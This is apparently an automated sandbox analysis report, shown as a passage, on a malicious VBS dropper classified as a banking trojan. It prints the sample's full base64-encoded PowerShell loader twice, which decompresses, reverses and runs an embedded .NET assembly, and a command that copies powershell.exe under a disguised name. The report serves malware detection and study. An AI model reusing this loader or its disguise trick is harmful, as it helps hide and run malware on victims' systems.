gBpAHAAUwB0AHIAZQBhAG0AIAAkAEMAZABtAHQAcQBxAHYAdwBtAGoALAAgACgAWwBJAE8ALgBDAG8AbQBwAHIAZQBzAHMAaQBvAG4ALgBDAG8AbQBwAHIAZQBzAHMAaQBvAG4ATQBvAGQAZQBdADoAOgBEAGUAYwBvAG0AcAByAGUAcwBzACkAOwAkAEcAdQB6AHAAYgBnAHAALgBDAG8AcAB5AFQAbwAoACAAJABDAHUAbQBhAHEAeQBqAG0AIAApADsAJABHAHUAegBwAGIAZwBwAC4AQwBsAG8AcwBlACgAKQA7ACQAQwBkAG0AdABxAHEAdgB3AG0AagAuAEMAbABvAHMAZQAoACkAOwBbAGIAeQB0AGUAWwBdAF0AIAAkAFUAYwBqAHEAeQB1AGUAZQAgAD0AIAAkAEMAdQBtAGEAcQB5AGoAbQAuAFQAbwBBAHIAcgBhAHkAKAApADsAWwBBAHIAcgBhAHkAXQA6ADoAUgBlAHYAZQByAHMAZQAoACQAVQBjAGoAcQB5AHUAZQBlACkAOwAgACQARQB6AHgAcABnAHoAbgBoAHYAegBqACAAPQAgAFsAUwB5AHMAdABlAG0ALgBUAGgAcgBlAGEAZABpAG4AZwAuAFQAaAByAGUAYQBkAF0AOgA6AEcAZQB0AEQAbwBtAGEAaQBuACgAKQAuAEwAbwBhAGQAKAAkAFUAYwBqAHEAeQB1AGUAZQApADsAIAAkAEQAcwBwAHcAdAAgAD0AIAAkAEUAegB4AHAAZwB6AG4AaAB2AHoAagAuAEUAbgB0AHIAeQBQAG8AaQBuAHQAOwAgAFsAUwB5AHMAdABlAG0ALgBEAGUAbABlAGcAYQB0AGUAXQA6ADoAQwByAGUAYQB0AGUARABlAGwAZQBnAGEAdABlACgAWwBBAGMAdABpAG8AbgBdACwAIAAkAEQAcwBwAHcAdAAuAEQAZQBjAGwAYQByAGkAbgBnAFQAeQBwAGUALAAgACQARABzAHAAdwB0AC4ATgBhAG0AZQApAC4ARAB5AG4AYQBtAGkAYwBJAG4AdgBvAGsAZQAoACkAIAB8ACAATwB1AHQALQBOAHUAbABsAA==Jump to behavior

Spam, unwanted Advertisements and Ransom Demands

barindex
Reads the Security eventlog
Source: C:\Users\user\Desktop\8820_715_SCAN.vbs.exeKey opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\SecurityJump to behavior
Source: C:\Users\user\Desktop\8820_715_SCAN.vbs.exeKey opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\SecurityJump to behavior
Source: C:\Users\user\Desktop\8820_715_SCAN.vbs.exeKey opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\SecurityJump to behavior
Source: C:\Users\user\Desktop\8820_715_SCAN.vbs.exeKey opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\SecurityJump to behavior
Reads the System eventlog
Source: C:\Users\user\Desktop\8820_715_SCAN.vbs.exeKey opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\SystemJump to behavior
Source: C:\Users\user\Desktop\8820_715_SCAN.vbs.exeKey opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\SystemJump to behavior
Source: C:\Users\user\Desktop\8820_715_SCAN.vbs.exeKey opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\SystemJump to behavior
Source: C:\Users\user\Desktop\8820_715_SCAN.vbs.exeKey opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\SystemJump to behavior

System Summary

barindex
Malicious sample detected (through community Yara rule)
Source: amsi32_6536.amsi.csv, type: OTHERMatched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
Source: Process Memory Space: 8820_715_SCAN.vbs.exe PID: 6536, type: MEMORYSTRMatched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
Windows Scripting host queries suspicious COM object (likely to drop second stage)
Source: C:\Windows\System32\wscript.exeCOM Object queried: Windows Script Host Shell Object HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{72C24DD5-D70A-438B-8A42-98424B88AFB8}Jump to behavior
Source: C:\Windows\System32\wscript.exeCOM Object queried: WBEM Locator HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{4590F811-1D3A-11D0-891F-00AA004B2E24}Jump to behavior
Source: C:\Windows\System32\wscript.exeCOM Object queried: Windows Management and Instrumentation HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{8BC3F05E-D86B-11D0-A075-00C04FB68820}Jump to behavior
Source: C:\Users\user\Desktop\8820_715_SCAN.vbs.exeCode function: 4_2_0328C02B4_2_0328C02B
Source: C:\Users\user\Desktop\8820_715_SCAN.vbs.exeCode function: 4_2_0328BE754_2_0328BE75
Source: 8820_715_SCAN.vbsInitial sample: Strings found which are bigger than 50
Source: 8820_715_SCAN.vbs.exe, 00000004.00000002.2122658640.0000000008690000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilename8820_715.exe2 vs 8820_715_SCAN.vbs
Source: 8820_715_SCAN.vbs.exe, 00000004.00000002.2124479625.00000000095B1000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilename8820_715.exe2 vs 8820_715_SCAN.vbs
Source: 8820_715_SCAN.vbs.exe, 00000004.00000002.2101400946.0000000004EE1000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilename vs 8820_715_SCAN.vbs
Source: 8820_715_SCAN.vbs.exe, 00000004.00000002.2101400946.0000000004F36000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFileName vs 8820_715_SCAN.vbs
Source: 8820_715_SCAN.vbs.exe, 00000004.00000002.2100135986.0000000002E99000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameclr.dllT vs 8820_715_SCAN.vbs
Source: 8820_715_SCAN.vbs.exe, 00000004.00000000.2083698955.00000000006B4000.00000002.00000001.01000000.00000005.sdmpBinary or memory string: OriginalFilenamePowerShell.EXEj% vs 8820_715_SCAN.vbs
Source: 8820_715_SCAN.vbs.exe.2.drBinary or memory string: OriginalFilenamePowerShell.EXEj% vs 8820_715_SCAN.vbs
Source: C:\Windows\System32\wscript.exeProcess created: Commandline size = 2269
Source: C:\Windows\System32\wscript.exeProcess created: Commandline size = 2269Jump to behavior
Source: amsi32_6536.amsi.csv, type: OTHERMatched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
Source: Process Memory Space: 8820_715_SCAN.vbs.exe PID: 6536, type: MEMORYSTRMatched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
Source: classification engineClassification label: mal96.bank.evad.winVBS@6/5@0/0
Source: C:\Windows\System32\cmd.exeFile created: C:\Users\user\Desktop\8820_715_SCAN.vbs.exeJump to behavior
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2520:120:WilError_03
Source: C:\Users\user\Desktop\8820_715_SCAN.vbs.exeMutant created: NULL
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4952:120:WilError_03
Source: C:\Users\user\Desktop\8820_715_SCAN.vbs.exeFile created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_0qljaljk.p4c.ps1Jump to behavior
Source: unknownProcess created: C:\Windows\System32\wscript.exe C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\8820_715_SCAN.vbs"
Source: C:\Windows\System32\wscript.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\Windows\System32\wscript.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
Source: C:\Windows\System32\wscript.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
Source: 8820_715_SCAN.vbsVirustotal: Detection: 14%
Source: C:\Users\user\Desktop\8820_715_SCAN.vbs.exeFile read: C:\Users\user\Desktop\8820_715_SCAN.vbsJump to behavior
Source: unknownProcess created: C:\Windows\System32\wscript.exe C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\8820_715_SCAN.vbs"
Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\cmd.exe cmd /c copy "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" "C:\Users\user\Desktop\8820_715_SCAN.vbs.exe" /Y
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\wscript.exeProcess created: C:\Users\user\Desktop\8820_715_SCAN.vbs.exe "C:\Users\user\Desktop\8820_715_SCAN.vbs.exe" -enc JABJAGcAbwB0AGYAbwBhAGMAIAA9ACAAWwBTAHkAcwB0AGUAbQAuAEQAaQBhAGcAbgBvAHMAdABpAGMAcwAuAFAAcgBvAGMAZQBzAHMAXQA6ADoARwBlAHQAQwB1AHIAcgBlAG4AdABQAHIAbwBjAGUAcwBzACgAKQAuAE0AYQBpAG4ATQBvAGQAdQBsAGUALgBGAGkAbABlAE4AYQBtAGUALgBSAGUAcABsAGEAYwBlACgAJwAuAGUAeABlACcALAAnACcAKQA7ACQAQgB1AHAAbABzAHMAZgBnAGMAegAgAD0AIABnAGUAdAAtAGMAbwBuAHQAZQBuAHQAIAAkAEkAZwBvAHQAZgBvAGEAYwAgAHwAIABTAGUAbABlAGMAdAAtAE8AYgBqAGUAYwB0ACAALQBMAGEAcwB0ACAAMQA7ACAAJABVAGMAagBxAHkAdQBlAGUAIAA9ACAAWwBTAHkAcwB0AGUAbQAuAEMAbwBuAHYAZQByAHQAXQA6ADoARgByAG8AbQBCAGEAcwBlADYANABTAHQAcgBpAG4AZwAoACQAQgB1AHAAbABzAHMAZgBnAGMAegAuAFIAZQBwAGwAYQBjAGUAKAAnAFIARQBNACAAJwAsACAAJwAnACkALgBSAGUAcABsAGEAYwBlACgAJwBAACcALAAgACcAQQAnACkAKQA7ACQAQwBkAG0AdABxAHEAdgB3AG0AagAgAD0AIABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBJAE8ALgBNAGUAbQBvAHIAeQBTAHQAcgBlAGEAbQAoACAALAAgACQAVQBjAGoAcQB5AHUAZQBlACAAKQA7ACQAQwB1AG0AYQBxAHkAagBtACAAPQAgAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAEkATwAuAE0AZQBtAG8AcgB5AFMAdAByAGUAYQBtADsAJABHAHUAegBwAGIAZwBwACAAPQAgAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAEkATwAuAEMAbwBtAHAAcgBlAHMAcwBpAG8AbgAuAEcAegBpAHAAUwB0AHIAZQBhAG0AIAAkAEMAZABtAHQAcQBxAHYAdwBtAGoALAAgACgAWwBJAE8ALgBDAG8AbQBwAHIAZQBzAHMAaQBvAG4ALgBDAG8AbQBwAHIAZQBzAHMAaQBvAG4ATQBvAGQAZQBdADoAOgBEAGUAYwBvAG0AcAByAGUAcwBzACkAOwAkAEcAdQB6AHAAYgBnAHAALgBDAG8AcAB5AFQAbwAoACAAJABDAHUAbQBhAHEAeQBqAG0AIAApADsAJABHAHUAegBwAGIAZwBwAC4AQwBsAG8AcwBlACgAKQA7ACQAQwBkAG0AdABxAHEAdgB3AG0AagAuAEMAbABvAHMAZQAoACkAOwBbAGIAeQB0AGUAWwBdAF0AIAAkAFUAYwBqAHEAeQB1AGUAZQAgAD0AIAAkAEMAdQBtAGEAcQB5AGoAbQAuAFQAbwBBAHIAcgBhAHkAKAApADsAWwBBAHIAcgBhAHkAXQA6ADoAUgBlAHYAZQByAHMAZQAoACQAVQBjAGoAcQB5AHUAZQBlACkAOwAgACQARQB6AHgAcABnAHoAbgBoAHYAegBqACAAPQAgAFsAUwB5AHMAdABlAG0ALgBUAGgAcgBlAGEAZABpAG4AZwAuAFQAaAByAGUAYQBkAF0AOgA6AEcAZQB0AEQAbwBtAGEAaQBuACgAKQAuAEwAbwBhAGQAKAAkAFUAYwBqAHEAeQB1AGUAZQApADsAIAAkAEQAcwBwAHcAdAAgAD0AIAAkAEUAegB4AHAAZwB6AG4AaAB2AHoAagAuAEUAbgB0AHIAeQBQAG8AaQBuAHQAOwAgAFsAUwB5AHMAdABlAG0ALgBEAGUAbABlAGcAYQB0AGUAXQA6ADoAQwByAGUAYQB0AGUARABlAGwAZQBnAGEAdABlACgAWwBBAGMAdABpAG8AbgBdACwAIAAkAEQAcwBwAHcAdAAuAEQAZQBjAGwAYQByAGkAbgBnAFQAeQBwAGUALAAgACQARABzAHAAdwB0AC4ATgBhAG0AZQApAC4ARAB5AG4AYQBtAGkAYwBJAG4AdgBvAGsAZQAoACkAIAB8ACAATwB1AHQALQBOAHUAbABsAA==
Source: C:\Users\user\Desktop\8820_715_SCAN.vbs.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\wscript.exeProcess created: C:\Users\user\Desktop\8820_715_SCAN.vbs.exe "C:\Users\user\Desktop\8820_715_SCAN.vbs.exe" -enc JABJAGcAbwB0AGYAbwBhAGMAIAA9ACAAWwBTAHkAcwB0AGUAbQAuAEQAaQBhAGcAbgBvAHMAdABpAGMAcwAuAFAAcgBvAGMAZQBzAHMAXQA6ADoARwBlAHQAQwB1AHIAcgBlAG4AdABQAHIAbwBjAGUAcwBzACgAKQAuAE0AYQBpAG4ATQBvAGQAdQBsAGUALgBGAGkAbABlAE4AYQBtAGUALgBSAGUAcABsAGEAYwBlACgAJwAuAGUAeABlACcALAAnACcAKQA7ACQAQgB1AHAAbABzAHMAZgBnAGMAegAgAD0AIABnAGUAdAAtAGMAbwBuAHQAZQBuAHQAIAAkAEkAZwBvAHQAZgBvAGEAYwAgAHwAIABTAGUAbABlAGMAdAAtAE8AYgBqAGUAYwB0ACAALQBMAGEAcwB0ACAAMQA7ACAAJABVAGMAagBxAHkAdQBlAGUAIAA9ACAAWwBTAHkAcwB0AGUAbQAuAEMAbwBuAHYAZQByAHQAXQA6ADoARgByAG8AbQBCAGEAcwBlADYANABTAHQAcgBpAG4AZwAoACQAQgB1AHAAbABzAHMAZgBnAGMAegAuAFIAZQBwAGwAYQBjAGUAKAAnAFIARQBNACAAJwAsACAAJwAnACkALgBSAGUAcABsAGEAYwBlACgAJwBAACcALAAgACcAQQAnACkAKQA7ACQAQwBkAG0AdABxAHEAdgB3AG0AagAgAD0AIABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBJAE8ALgBNAGUAbQBvAHIAeQBTAHQAcgBlAGEAbQAoACAALAAgACQAVQBjAGoAcQB5AHUAZQBlACAAKQA7ACQAQwB1AG0AYQBxAHkAagBtACAAPQAgAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAEkATwAuAE0AZQBtAG8AcgB5AFMAdAByAGUAYQBtADsAJABHAHUAegBwAGIAZwBwACAAPQAgAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAEkATwAuAEMAbwBtAHAAcgBlAHMAcwBpAG8AbgAuAEcAegBpAHAAUwB0AHIAZQBhAG0AIAAkAEMAZABtAHQAcQBxAHYAdwBtAGoALAAgACgAWwBJAE8ALgBDAG8AbQBwAHIAZQBzAHMAaQBvAG4ALgBDAG8AbQBwAHIAZQBzAHMAaQBvAG4ATQBvAGQAZQBdADoAOgBEAGUAYwBvAG0AcAByAGUAcwBzACkAOwAkAEcAdQB6AHAAYgBnAHAALgBDAG8AcAB5AFQAbwAoACAAJABDAHUAbQBhAHEAeQBqAG0AIAApADsAJABHAHUAegBwAGIAZwBwAC4AQwBsAG8AcwBlACgAKQA7ACQAQwBkAG0AdABxAHEAdgB3AG0AagAuAEMAbABvAHMAZQAoACkAOwBbAGIAeQB0AGUAWwBdAF0AIAAkAFUAYwBqAHEAeQB1AGUAZQAgAD0AIAAkAEMAdQBtAGEAcQB5AGoAbQAuAFQAbwBBAHIAcgBhAHkAKAApADsAWwBBAHIAcgBhAHkAXQA6ADoAUgBlAHYAZQByAHMAZQAoACQAVQBjAGoAcQB5AHUAZQBlACkAOwAgACQARQB6AHgAcABnAHoAbgBoAHYAegBqACAAPQAgAFsAUwB5AHMAdABlAG0ALgBUAGgAcgBlAGEAZABpAG4AZwAuAFQAaAByAGUAYQBkAF0AOgA6AEcAZQB0AEQAbwBtAGEAaQBuACgAKQAuAEwAbwBhAGQAKAAkAFUAYwBqAHEAeQB1AGUAZQApADsAIAAkAEQAcwBwAHcAdAAgAD0AIAAkAEUAegB4AHAAZwB6AG4AaAB2AHoAagAuAEUAbgB0AHIAeQBQAG8AaQBuAHQAOwAgAFsAUwB5AHMAdABlAG0ALgBEAGUAbABlAGcAYQB0AGUAXQA6ADoAQwByAGUAYQB0AGUARABlAGwAZQBnAGEAdABlACgAWwBBAGMAdABpAG8AbgBdACwAIAAkAEQAcwBwAHcAdAAuAEQAZQBjAGwAYQByAGkAbgBnAFQAeQBwAGUALAAgACQARABzAHAAdwB0AC4ATgBhAG0AZQApAC4ARAB5AG4AYQBtAGkAYwBJAG4AdgBvAGsAZQAoACkAIAB8ACAATwB1AHQALQBOAHUAbABsAA==Jump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: version.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: uxtheme.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: sxs.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: vbscript.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: amsi.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: userenv.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: profapi.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: wldp.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: msasn1.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: cryptsp.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: rsaenh.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: cryptbase.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: msisip.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: wshext.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: scrobj.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: scrrun.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: mpr.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: wbemcomn.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: windows.storage.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: propsys.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: apphelp.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: twext.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: cscui.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: windows.staterepositoryps.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: appresolver.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: bcp47langs.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: slc.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: sppc.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: policymanager.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: msvcp110_win.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: workfoldersshell.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: ntshrui.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: sspicli.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: windows.fileexplorer.common.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: iertutil.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: srvcli.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: cscapi.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: netutils.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: twinapi.appcore.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: shacct.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: textshaping.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: idstore.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: wtsapi32.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: samlib.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: starttiledata.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: coremessaging.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: usermgrcli.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: usermgrproxy.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: wlidprov.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: samcli.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: provsvc.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: acppage.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: sfc.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: msi.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: aepic.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: ntmarta.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: sfc_os.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: edputil.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: urlmon.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: wintypes.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: onecorecommonproxystub.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
Source: C:\Windows\System32\cmd.exeSection loaded: ntmarta.dllJump to behavior
Source: C:\Users\user\Desktop\8820_715_SCAN.vbs.exeSection loaded: atl.dllJump to behavior
Source: C:\Users\user\Desktop\8820_715_SCAN.vbs.exeSection loaded: mscoree.dllJump to behavior
Source: C:\Users\user\Desktop\8820_715_SCAN.vbs.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Users\user\Desktop\8820_715_SCAN.vbs.exeSection loaded: version.dllJump to behavior
Source: C:\Users\user\Desktop\8820_715_SCAN.vbs.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
Source: C:\Users\user\Desktop\8820_715_SCAN.vbs.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
Source: C:\Users\user\Desktop\8820_715_SCAN.vbs.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
Source: C:\Users\user\Desktop\8820_715_SCAN.vbs.exeSection loaded: cryptsp.dllJump to behavior
Source: C:\Users\user\Desktop\8820_715_SCAN.vbs.exeSection loaded: rsaenh.dllJump to behavior
Source: C:\Users\user\Desktop\8820_715_SCAN.vbs.exeSection loaded: cryptbase.dllJump to behavior
Source: C:\Users\user\Desktop\8820_715_SCAN.vbs.exeSection loaded: amsi.dllJump to behavior
Source: C:\Users\user\Desktop\8820_715_SCAN.vbs.exeSection loaded: userenv.dllJump to behavior
Source: C:\Users\user\Desktop\8820_715_SCAN.vbs.exeSection loaded: profapi.dllJump to behavior
Source: C:\Users\user\Desktop\8820_715_SCAN.vbs.exeSection loaded: windows.storage.dllJump to behavior
Source: C:\Users\user\Desktop\8820_715_SCAN.vbs.exeSection loaded: wldp.dllJump to behavior
Source: C:\Users\user\Desktop\8820_715_SCAN.vbs.exeSection loaded: msasn1.dllJump to behavior
Source: C:\Users\user\Desktop\8820_715_SCAN.vbs.exeSection loaded: msisip.dllJump to behavior
Source: C:\Users\user\Desktop\8820_715_SCAN.vbs.exeSection loaded: wshext.dllJump to behavior
Source: C:\Users\user\Desktop\8820_715_SCAN.vbs.exeSection loaded: appxsip.dllJump to behavior
Source: C:\Users\user\Desktop\8820_715_SCAN.vbs.exeSection loaded: opcservices.dllJump to behavior
Source: C:\Users\user\Desktop\8820_715_SCAN.vbs.exeSection loaded: gpapi.dllJump to behavior
Source: C:\Users\user\Desktop\8820_715_SCAN.vbs.exeSection loaded: secur32.dllJump to behavior
Source: C:\Users\user\Desktop\8820_715_SCAN.vbs.exeSection loaded: sspicli.dllJump to behavior
Source: C:\Users\user\Desktop\8820_715_SCAN.vbs.exeSection loaded: uxtheme.dllJump to behavior
Source: C:\Windows\System32\wscript.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{B54F3741-5B07-11cf-A4B0-00AA004A55E8}\InprocServer32Jump to behavior
Source: C:\Users\user\Desktop\8820_715_SCAN.vbs.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dllJump to behavior
Source: 8820_715_SCAN.vbsStatic file information: File size 2614358 > 1048576
Source: Binary string: corlib.pdbHN9 source: 8820_715_SCAN.vbs.exe, 00000004.00000002.2119934814.0000000007824000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: System.Management.Automation.pdb-2476756634-1003_Classes\WOW6432Node\CLSID\{0A29FF9E-7F9C-4437-8B11-F424491E3931}\InprocServer32 source: 8820_715_SCAN.vbs.exe, 00000004.00000002.2119934814.00000000078E0000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: mscorlib.pdb source: 8820_715_SCAN.vbs.exe, 00000004.00000002.2119934814.0000000007810000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: ore.pdbS source: 8820_715_SCAN.vbs.exe, 00000004.00000002.2119934814.0000000007824000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: System.Core.pdb source: 8820_715_SCAN.vbs.exe, 00000004.00000002.2119934814.00000000078E0000.00000004.00000020.00020000.00000000.sdmp, 8820_715_SCAN.vbs.exe, 00000004.00000002.2119934814.0000000007810000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\System.Management.Automation.pdb source: 8820_715_SCAN.vbs.exe, 00000004.00000002.2119934814.00000000078A9000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: powershell.pdbUGP source: 8820_715_SCAN.vbs.exe, 00000004.00000000.2083664847.0000000000651000.00000020.00000001.01000000.00000005.sdmp, 8820_715_SCAN.vbs.exe.2.dr
Source: Binary string: mscorlib.pdb246122658-3693405117-2476756634-1003_Classes\WOW6432Node\CLSID\{0A29FF9E-7F9C-4437-8B11-F424491E3931}\InprocServer32 source: 8820_715_SCAN.vbs.exe, 00000004.00000002.2119934814.00000000078E0000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_32\mscorlib\v4.0_4.0.0.0__b77a5c561934e089\mscorlib.pdb source: 8820_715_SCAN.vbs.exe, 00000004.00000002.2119934814.00000000078A9000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: powershell.pdb source: 8820_715_SCAN.vbs.exe, 00000004.00000000.2083664847.0000000000651000.00000020.00000001.01000000.00000005.sdmp, 8820_715_SCAN.vbs.exe.2.dr
Source: Binary string: System.Core.pdbk source: 8820_715_SCAN.vbs.exe, 00000004.00000002.2119934814.0000000007810000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\mscorlib.pdb]b source: 8820_715_SCAN.vbs.exe, 00000004.00000002.2119934814.00000000078A9000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Core\v4.0_4.0.0.0__b77a5c561934e089\System.Core.pdb source: 8820_715_SCAN.vbs.exe, 00000004.00000002.2119934814.00000000078A9000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\dll\System.Management.Automation.pdbv source: 8820_715_SCAN.vbs.exe, 00000004.00000002.2119934814.000000000785D000.00000004.00000020.00020000.00000000.sdmp

Persistence and Installation Behavior

barindex
Creates processes via WMI
Source: C:\Windows\System32\wscript.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\Windows\System32\cmd.exeFile created: C:\Users\user\Desktop\8820_715_SCAN.vbs.exeJump to dropped file
Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\8820_715_SCAN.vbs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\8820_715_SCAN.vbs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\8820_715_SCAN.vbs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\8820_715_SCAN.vbs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
